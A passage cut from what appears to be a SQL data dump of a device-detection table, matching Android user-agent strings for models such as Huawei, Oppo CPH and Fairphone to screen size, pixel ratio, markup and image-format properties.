Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CLT-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CLT-AL01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CLT-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CMR-AL09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":640,\"screenHeight\":1024,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CMR-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":640,\"screenHeight\":1024,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; COL-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; COL-L29) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; COL-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; COR-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; COR-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; COR-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1823) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1825) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1859) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1871) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1877) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1879) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1881) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1893) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1917) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1921) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1923) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1933) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1937) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1938) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1941) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1943) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1945) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1951) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1955) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1969) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1979) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1983) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1987) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH1989) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH2015) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH2021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; CPH2083) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Core-X4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; DLT-H0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; DRIVE_6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; DRIVE_6S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; DUK-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; DUK-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Digi C2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Digi R2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; E553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; E6910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ELE-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ELE-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ELE-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ELE-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; EML-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; EML-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; EML-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; EVR-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; EVR-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; EVR-N29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; F-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; F-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; F-04K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FIG-LA1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FIG-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FIG-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FIG-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FLA-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FLA-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FLA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FP2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; FP3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Flow 7S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Fly5_lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 